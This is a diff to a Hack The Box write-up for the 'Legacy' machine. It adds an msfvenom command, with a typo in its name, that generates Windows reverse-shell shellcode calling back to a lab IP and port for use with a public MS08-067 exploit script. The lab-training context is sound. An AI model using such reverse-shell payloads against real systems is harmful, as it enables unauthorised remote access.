0xCGonzalo/HtB-Write-Ups/Machines/Legacy/WriteUp.md

 # 04: Exploitation

 MS08-067: I will use [this exploit](https://github.com/andyacer/ms08_067) for exploit the vulnerability, this script requires impacket and replace the default shellcode with some of my own.
-Ok, to make the shellcode i used *msfvenom* and
+Ok, to make the shellcode i used *msfvenom*:
+`
+sfvenom -p windows/shell_reverse_tcp LHOST=10.10.14.11 LPORT=443 EXITFUNC=thread -b "\x00\x0a\x0d\x5c\x5f\x2f\x2e\x40" -f py -v shellcode -a x86 --platform windows
+`

 # 05: Post-Exploitation